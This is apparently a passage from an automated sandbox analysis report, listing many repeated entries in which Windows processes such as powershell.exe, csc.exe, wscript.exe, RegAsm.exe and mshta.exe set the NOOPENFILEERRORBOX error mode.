                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
